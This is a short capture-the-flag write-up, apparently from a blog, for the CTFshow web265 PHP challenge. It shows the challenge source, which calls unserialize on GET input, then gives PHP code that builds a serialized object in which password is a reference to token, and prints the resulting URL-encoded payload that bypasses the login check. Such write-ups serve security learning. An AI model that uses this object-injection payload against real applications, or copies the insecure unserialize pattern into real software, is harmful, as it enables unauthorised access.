CTFSHOW web265
<?php
error_reporting(0);
include('flag.php');
highlight_file(__FILE__);
class ctfshowAdmin{
public $token;
public $password;
public function __construct($t,$p){
$this->token=$t;
$this->password = $p;
}
public function login(){
return $this->token===$this->password;
}
}
$ctfshow = unserialize($_GET['ctfshow']);
$ctfshow->token=md5(mt_rand());
if($ctfshow->login()){
echo $flag;
}
?>可使password参数指向token参数的地址,这样不管token怎么变,两者始终相等。
payload获取代码:
<?php
class ctfshowAdmin{
public $token=1;
public $password=2;
}
$a = new ctfshowAdmin();
$a->password = &$a->token;
echo urlencode(serialize($a));
?>payload:
O%3A12%3A%22ctfshowAdmin%22%3A2%3A%7Bs%3A5%3A%22token%22%3Bi%3A1%3Bs%3A8%3A%22password%22%3BR%3A2%3B%7D
标签:传参,序列化,22%,3A%,echo,token,PHP,ctfshow,password From: https://blog.51cto.com/u_16350624/8316025